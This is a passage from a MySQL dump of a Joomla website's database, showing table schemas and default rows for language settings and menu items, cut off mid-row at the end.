  `value` longtext NOT NULL COMMENT 'serialized table value',
  `modified` datetime NOT NULL,
  `modified_by` int NOT NULL,
  `state` tinyint NOT NULL,
  PRIMARY KEY (`idJdStore`),
  UNIQUE KEY `idLang` (`idLang`,`referenceTable`,`idReference`)
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_jd_store`
--

LOCK TABLES `fz6t4_jd_store` WRITE;
/*!40000 ALTER TABLE `fz6t4_jd_store` DISABLE KEYS */;
/*!40000 ALTER TABLE `fz6t4_jd_store` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_languages`
--

DROP TABLE IF EXISTS `fz6t4_languages`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_languages` (
  `lang_id` int unsigned NOT NULL AUTO_INCREMENT,
  `asset_id` int unsigned NOT NULL DEFAULT '0',
  `lang_code` char(7) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL,
  `title` varchar(50) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `title_native` varchar(50) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `sef` varchar(50) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `image` varchar(50) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `description` varchar(512) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `metakey` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `metadesc` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL,
  `sitename` varchar(1024) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `published` int NOT NULL DEFAULT '0',
  `access` int unsigned NOT NULL DEFAULT '0',
  `ordering` int NOT NULL DEFAULT '0',
  PRIMARY KEY (`lang_id`),
  UNIQUE KEY `idx_sef` (`sef`),
  UNIQUE KEY `idx_langcode` (`lang_code`),
  KEY `idx_access` (`access`),
  KEY `idx_ordering` (`ordering`)
) ENGINE=MyISAM AUTO_INCREMENT=3 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_languages`
--

LOCK TABLES `fz6t4_languages` WRITE;
/*!40000 ALTER TABLE `fz6t4_languages` DISABLE KEYS */;
INSERT INTO `fz6t4_languages` VALUES (1,0,'en-GB','English (UK)','English (UK)','en','en','','','','',1,1,1),(2,0,'tr-TR','Turkish (TR)','Turkish (TR)','tr','tr','','','','',1,1,0);
/*!40000 ALTER TABLE `fz6t4_languages` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `fz6t4_menu`
--

DROP TABLE IF EXISTS `fz6t4_menu`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!50503 SET character_set_client = utf8mb4 */;
CREATE TABLE `fz6t4_menu` (
  `id` int NOT NULL AUTO_INCREMENT,
  `menutype` varchar(24) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The type of menu this item belongs to. FK to #__menu_types.menutype',
  `title` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The display title of the menu item.',
  `alias` varchar(400) CHARACTER SET utf8mb4 COLLATE utf8mb4_bin NOT NULL COMMENT 'The SEF alias of the menu item.',
  `note` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `path` varchar(1024) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The computed path of the menu item based on the alias field.',
  `link` varchar(1024) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The actually link the menu item refers to.',
  `type` varchar(16) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The type of link: Component, URL, Alias, Separator',
  `published` tinyint NOT NULL DEFAULT '0' COMMENT 'The published state of the menu link.',
  `parent_id` int unsigned NOT NULL DEFAULT '1' COMMENT 'The parent menu item in the menu tree.',
  `level` int unsigned NOT NULL DEFAULT '0' COMMENT 'The relative level in the tree.',
  `component_id` int unsigned NOT NULL DEFAULT '0' COMMENT 'FK to #__extensions.id',
  `checked_out` int unsigned NOT NULL DEFAULT '0' COMMENT 'FK to #__users.id',
  `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00' COMMENT 'The time the menu item was checked out.',
  `browserNav` tinyint NOT NULL DEFAULT '0' COMMENT 'The click behaviour of the link.',
  `access` int unsigned NOT NULL DEFAULT '0' COMMENT 'The access level required to view the menu item.',
  `img` varchar(255) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'The image of the menu item.',
  `template_style_id` int unsigned NOT NULL DEFAULT '0',
  `params` mediumtext CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL COMMENT 'JSON encoded data for the menu item.',
  `lft` int NOT NULL DEFAULT '0' COMMENT 'Nested set lft.',
  `rgt` int NOT NULL DEFAULT '0' COMMENT 'Nested set rgt.',
  `home` tinyint unsigned NOT NULL DEFAULT '0' COMMENT 'Indicates if this menu item is the home or default page.',
  `language` char(7) CHARACTER SET utf8mb4 COLLATE utf8mb4_unicode_ci NOT NULL DEFAULT '',
  `client_id` tinyint NOT NULL DEFAULT '0',
  PRIMARY KEY (`id`),
  UNIQUE KEY `idx_client_id_parent_id_alias_language` (`client_id`,`parent_id`,`alias`(100),`language`),
  KEY `idx_componentid` (`component_id`,`menutype`,`published`,`access`),
  KEY `idx_menutype` (`menutype`),
  KEY `idx_left_right` (`lft`,`rgt`),
  KEY `idx_language` (`language`),
  KEY `idx_alias` (`alias`(100)),
  KEY `idx_path` (`path`(100))
) ENGINE=MyISAM AUTO_INCREMENT=740 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `fz6t4_menu`
--

LOCK TABLES `fz6t4_menu` WRITE;
/*!40000 ALTER TABLE `fz6t4_menu` DISABLE KEYS */;
INSERT INTO `fz6t4_menu` VALUES (1,'','Menu_Item_Root','root','','','','',1,0,0,0,0,'0000-00-00 00:00:00',0,0,'',0,'',0,393,0,'*',0),(2,'main','com_banners','Banners','','Banners','index.php?option=com_banners','component',0,1,1,4,0,'0000-00-00 00:00:00',0,0,'class:banners',0,'',47,56,0,'*',1),(3,'main','com_banners','Banners','','Banners/Banners','index.php?option=com_banners','component',0,2,2,4,0,'0000-00-00 00:00:00',0,0,'class:banners',0,'',48,49,0,'*',1),(4,'main','com_banners_categories','Categories','','Banners/Categories','index.php?option=com_categories&extension=com_banners','component',0,2,2,6,0,'0000-00-00 00:00:00',0,0,'class:banners-cat',0,'',50,51,0,'*',1),(5,'main','com_banners_clients','Clients','','Banners/Clients','index.php?option=com_banners&view=clients','component',0,2,2,4,0,'0000-00-00 00:00:00',0,0,'class:banners-clients',0,'',52,53,0,'*',1),(6,'main','com_banners_tracks','Tracks','','Banners/Tracks','index.php?option=com_banners&view=tracks','component',0,2,2,4,0,'0000-00-00 00:00:00',0,0,'class:banners-tracks',0,'',54,55,0,'*',1),(7,'main','Contacts','Contacts','','Contacts','index.php?option=com_contact','component',1,1,1,8,0,'0000-00-00 00:00:00',0,0,'class:contact',0,'',57,62,0,'*',1),(8,'main','Contacts','Contacts','','Contacts/Contacts','index.php?option=com_contact','component',1,7,2,8,0,'0000-00-00 00:00:00',0,0,'class:contact',0,'',58,59,0,'*',1),(9,'main','Contact Categories','Categories','','Contacts/Categories','index.php?option=com_categories&extension=com_contact','component',1,7,2,6,0,'0000-00-00 00:00:00',0,0,'class:contact-cat',0,'',60,61,0,'*',1),(10,'main','com_messages','Messaging','','Messaging','index.php?option=com_messages','component',0,1,1,15,0,'0000-00-00 00:00:00',0,0,'class:messages',0,'',63,68,0,'*',1),(11,'main','com_messages_add','New Private Message','','Messaging/New Private Message','index.php?option=com_messages&task=message.add','component',0,10,2,15,0,'0000-00-00 00:00:00',0,0,'class:messages-add',0,'',64,65,0,'*',1),(12,'main','com_messages_read','Read Private Message','','Messaging/Read Private Message','index.php?option=com_messages','component',0,10,2,15,0,'0000-00-00 00:00:00',0,0,'class:messages-read',0,'',66,67,0,'*',1),(13,'main','com_newsfeeds','News Feeds','','News Feeds','index.php?option=com_newsfeeds','component',0,1,1,17,0,'0000-00-00 00:00:00',0,0,'class:newsfeeds',0,'',69,74,0,'*',1),(14,'main','com_newsfeeds_feeds','Feeds','','News Feeds/Feeds','index.php?option=com_newsfeeds','component',0,13,2,17,0,'0000-00-00 00:00:00',0,0,'class:newsfeeds',0,'',70,71,0,'*',1),(15,'main','com_newsfeeds_categories','Categories','','News Feeds/Categories','index.php?option=com_categories&extension=com_newsfeeds','component',0,13,2,6,0,'0000-00-00 00:00:00',0,0,'class:newsfeeds-cat',0,'',72,73,0,'*',1),(16,'main','com_redirect','Redirect','','Redirect','index.php?option=com_redirect','component',0,1,1,24,0,'0000-00-00 00:00:00',0,0,'class:redirect',0,'',89,90,0,'*',1),(17,'main','com_search','Basic Search','','Basic Search','index.php?option=com_search','component',0,1,1,19,0,'0000-00-00 00:00:00',0,0,'class:search',0,'',79,80,0,'*',1),(18,'main','com_weblinks','Weblinks','','Weblinks','index.php?option=com_weblinks','component',0,1,1,21,0,'0000-00-00 00:00:00',0,0,'class:weblinks',0,'',83,88,0,'*',1),(19,'main','com_weblinks_links','Links','','Weblinks/Links','index.php?option=com_weblinks','component',0,18,2,21,0,'0000-00-00 00:00:00',0,0,'class:weblinks',0,'',84,85,0,'*',1),(20,'main','com_weblinks_categories','Categories','','Weblinks/Categories','index.php?option=com_categories&extension=com_weblinks','component',0,18,2,6,0,'0000-00-00 00:00:00',0,0,'class:weblinks-cat',0,'',86,87,0,'*',1),(21,'main','com_finder','Smart Search','','Smart Search','index.php?option=com_finder','component',0,1,1,27,0,'0000-00-00 00:00:00',0,0,'class:finder',0,'',77,78,0,'*',1),(22,'main','com_joomlaupdate','Joomla! Update','','Joomla! Update','index.php?option=com_joomlaupdate','component',0,1,1,28,0,'0000-00-00 00:00:00',0,0,'class:joomlaupdate',0,'',75,76,0,'*',1),(201,'usermenu','Your Profile','your-profile','','your-profile','index.php?option=com_users&view=profile','component',1,1,1,25,0,'0000-00-00 00:00:00',0,2,'',115,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',273,274,0,'*',0),(207,'top','Joomla.org','joomlaorg','','joomlaorg','http://joomla.org','url',1,1,1,0,0,'0000-00-00 00:00:00',0,1,'',115,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\"}',271,272,0,'*',0),(227,'aboutjoomla','Weblinks Categories','weblinks-categories','','using-joomla/extensions/components/weblinks-component/weblinks-categories','index.php?option=com_weblinks&view=categories&id=18','component',1,265,5,21,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_base_description\":\"\",\"categories_description\":\"\",\"maxLevelcat\":\"-1\",\"show_empty_categories_cat\":\"\",\"show_subcat_desc_cat\":\"\",\"show_cat_num_links_cat\":\"\",\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"-1\",\"show_empty_categories\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_links\":\"\",\"show_pagination_limit\":\"\",\"show_headings\":\"\",\"show_link_description\":\"\",\"show_link_hits\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',125,126,0,'*',0),(229,'aboutjoomla','Single Contact','single-contact','','using-joomla/extensions/components/contact-component/single-contact','index.php?option=com_contact&view=contact&id=1','component',1,270,5,8,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_category_crumb\":\"\",\"presentation_style\":\"\",\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',115,116,0,'*',0),(233,'mainmenu-degil','Login','login','','login','index.php?option=com_users&view=login','component',0,1,1,25,0,'0000-00-00 00:00:00',0,1,'',115,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',45,46,0,'*',0),(238,'mainmenu-degil','Sample Sites','sample-sites','','sample-sites','index.php?option=com_content&view=article&id=38','component',0,1,1,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"0\",\"link_category\":\"\",\"show_parent_category\":\"0\",\"link_parent_category\":\"\",\"show_author\":\"0\",\"link_author\":\"\",\"show_create_date\":\"0\",\"show_modify_date\":\"0\",\"show_publish_date\":\"0\",\"show_item_navigation\":\"0\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"0\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',275,280,0,'*',0),(249,'aboutjoomla','Submit a Weblink','submit-a-weblink','','using-joomla/extensions/components/weblinks-component/submit-a-weblink','index.php?option=com_weblinks&view=form&layout=edit','component',1,265,5,21,0,'0000-00-00 00:00:00',0,3,'',115,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',121,122,0,'*',0),(251,'aboutjoomla','Contact Categories','contact-categories','','using-joomla/extensions/components/contact-component/contact-categories','index.php?option=com_contact&view=categories&id=16','component',1,270,5,8,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_base_description\":\"\",\"categories_description\":\"\",\"maxLevel\":\"-1\",\"show_empty_categories\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"show_cat_num_articles\":\"\",\"display_num\":\"\",\"show_headings\":\"\",\"filter_field\":\"\",\"show_pagination\":\"\",\"show_noauth\":\"\",\"presentation_style\":\"sliders\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_links\":\"1\",\"linka_name\":\"\",\"linkb_name\":\"\",\"linkc_name\":\"\",\"linkd_name\":\"\",\"linke_name\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',111,112,0,'*',0),(252,'aboutjoomla','News Feed Categories','new-feed-categories','','using-joomla/extensions/components/news-feeds-component/new-feed-categories','index.php?option=com_newsfeeds&view=categories&id=0','component',1,267,5,17,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_base_description\":\"1\",\"categories_description\":\"Because this links to the root category the \"uncategorised\" category is displayed. \",\"maxLevel\":\"-1\",\"show_empty_categories\":\"1\",\"show_description\":\"1\",\"show_description_image\":\"1\",\"show_cat_num_articles\":\"1\",\"display_num\":\"\",\"show_headings\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_noauth\":\"\",\"show_feed_image\":\"\",\"show_feed_description\":\"\",\"show_item_description\":\"\",\"feed_character_count\":\"0\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',129,130,0,'*',0),(253,'aboutjoomla','News Feed Category','news-feed-category','','using-joomla/extensions/components/news-feeds-component/news-feed-category','index.php?option=com_newsfeeds&view=category&id=17','component',1,267,5,17,0,'0000-00-00 00:00:00',0,1,'',115,'{\"maxLevel\":\"-1\",\"show_empty_categories\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"show_cat_num_articles\":\"\",\"display_num\":\"\",\"show_headings\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_noauth\":\"\",\"show_feed_image\":\"\",\"show_feed_description\":\"\",\"show_item_description\":\"\",\"feed_character_count\":\"0\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',133,134,0,'*',0),(254,'aboutjoomla','Single News Feed','single-news-feed','','using-joomla/extensions/components/news-feeds-component/single-news-feed','index.php?option=com_newsfeeds&view=newsfeed&id=4','component',1,267,5,17,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_feed_image\":\"\",\"show_feed_description\":\"\",\"show_item_description\":\"\",\"feed_character_count\":\"0\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',131,132,0,'*',0),(255,'aboutjoomla','Search','search','','using-joomla/extensions/components/search-component/search','index.php?option=com_search&view=search','component',1,276,5,19,0,'0000-00-00 00:00:00',0,1,'',115,'{\"search_areas\":\"1\",\"show_date\":\"1\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',151,152,0,'*',0),(256,'aboutjoomla','Archived Articles','archived-articles','','using-joomla/extensions/components/content-component/archived-articles','index.php?option=com_content&view=archive','component',1,266,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"orderby_sec\":\"\",\"order_date\":\"\",\"display_num\":\"\",\"filter_field\":\"\",\"show_category\":\"1\",\"link_category\":\"1\",\"show_title\":\"1\",\"link_titles\":\"1\",\"show_intro\":\"1\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_readmore\":\"\",\"show_hits\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',105,106,0,'*',0),(257,'aboutjoomla','Single Article','single-article','','using-joomla/extensions/components/content-component/single-article','index.php?option=com_content&view=article&id=6','component',1,266,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',95,96,0,'*',0),(259,'aboutjoomla','Article Category Blog','article-category-blog','','using-joomla/extensions/components/content-component/article-category-blog','index.php?option=com_content&view=category&layout=blog&id=27','component',1,266,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_description\":\"0\",\"show_description_image\":\"0\",\"show_category_title\":\"\",\"show_cat_num_articles\":\"\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"4\",\"num_columns\":\"2\",\"num_links\":\"4\",\"multi_column_order\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"\",\"order_date\":\"\",\"show_pagination\":\"2\",\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_readmore\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_feed_link\":\"1\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',99,100,0,'*',0),(260,'aboutjoomla','Article Category List','article-category-list','','using-joomla/extensions/components/content-component/article-category-list','index.php?option=com_content&view=category&id=19','component',1,266,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_category_title\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_no_articles\":\"\",\"show_subcat_desc\":\"\",\"show_cat_num_articles\":\"\",\"page_subheading\":\"\",\"show_pagination_limit\":\"\",\"filter_field\":\"\",\"show_headings\":\"\",\"list_show_date\":\"\",\"date_format\":\"\",\"list_show_hits\":\"\",\"list_show_author\":\"\",\"orderby_pri\":\"\",\"orderby_sec\":\"alpha\",\"order_date\":\"\",\"show_pagination\":\"\",\"show_pagination_results\":\"\",\"display_num\":\"10\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_vote\":\"\",\"show_readmore\":\"\",\"show_readmore_title\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"show_feed_link\":\"\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"menu_text\":1,\"page_title\":\"\",\"show_page_heading\":0,\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',101,102,0,'*',0),(262,'aboutjoomla','Featured Articles','featured-articles','','using-joomla/extensions/components/content-component/featured-articles','index.php?option=com_content&view=featured','component',1,266,5,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"maxLevel\":\"\",\"show_empty_categories\":\"\",\"show_description\":\"\",\"show_description_image\":\"\",\"show_cat_num_articles\":\"\",\"num_leading_articles\":\"1\",\"num_intro_articles\":\"4\",\"num_columns\":\"2\",\"num_links\":\"4\",\"multi_column_order\":\"1\",\"orderby_pri\":\"\",\"orderby_sec\":\"front\",\"order_date\":\"\",\"show_pagination\":\"2\",\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_readmore\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"show_feed_link\":\"1\",\"feed_summary\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',103,104,0,'*',0),(263,'aboutjoomla','Submit Article','submit-article','','using-joomla/extensions/components/content-component/submit-article','index.php?option=com_content&view=form&layout=edit','component',1,266,5,22,0,'0000-00-00 00:00:00',0,3,'',115,'{\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',107,108,0,'*',0),(265,'aboutjoomla','Weblinks Component','weblinks-component','','using-joomla/extensions/components/weblinks-component','index.php?option=com_content&view=article&id=54','component',1,268,4,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"show_noauth\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"robots\":\"\",\"rights\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"secure\":0}',120,127,0,'*',0),(266,'aboutjoomla','Content Component','content-component','','using-joomla/extensions/components/content-component','index.php?option=com_content&view=article&id=10','component',1,268,4,22,0,'0000-00-00 00:00:00',0,1,'',115,'{\"article-allow_ratings\":\"\",\"article-allow_comments\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_title\":\"\",\"link_titles\":\"\",\"show_intro\":\"\",\"show_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_hits\":\"\",\"menu-anchor_title\":\"\",\"menu-anchor_css\":\"\",\"menu_image\":\"\",\"show_page_heading\":0,\"page_title\":\"\",\"page_heading\":\"\",\"pageclass_sfx\":\"\",\"menu-meta_description\":\"\",\"menu-meta_keywords\":\"\",\"robots\":\"\",\"secure\":0}',94,109,0,'*',0),(267,'aboutjoomla','News Feeds 